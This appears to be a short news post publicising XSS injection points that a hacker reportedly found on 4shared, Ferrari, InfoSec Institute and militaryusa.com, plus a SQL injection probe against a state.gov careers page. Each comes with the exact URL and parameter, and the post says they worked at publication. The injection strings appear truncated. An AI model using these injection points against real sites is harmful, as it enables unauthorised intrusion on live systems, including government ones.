A hacker named @Charafanons has found XSS vulnerabilities in 5 major websites, all of which have a good standing on the Internet. @Charafanons sent us a tweet saying that he has found XSS vulnerabilities in #4shared, #Ferrari, #InfoSec, #militaryUsa, #StateGov.
We tested all the XSS vulnerabilities, and they were working at the time of publishing this news.
Here is the description of all the XSS Vulnerabilities:
4Shared :
http://www.4shared.com/web/acc/signup?login=”>
Proof : http://charafanons.net/xss/proof/4shared.png
————————————————————
Military usa :
http://www.militaryusa.com/cgi-bin/passwordreminder.cgi
In the email form, put: “>
Proof : http://charafanons.net/xss/proof/milusa.png
————————————————————
Info-Sec :
http://www.infosecinstitute.com/view_course_info.php?coursecode=SC&infotype=”>
Proof : http://charafanons.net/xss/proof/infosec.png < === Fixed
————————————————————
Ferrari :
http://www.ferrari.com/English/Formula1/Search/Pages/AllCategories.aspx?k=”>
Proof: http://charafanons.net/xss/proof/ferrari.png
————————————————————
Bonus : SQL injection in state.gov subdomain
http://careers.state.gov/survey/StateCareers/ThankYou.php?userid=58050%27
Proof : http://charafanons.net/xss/proof/state.png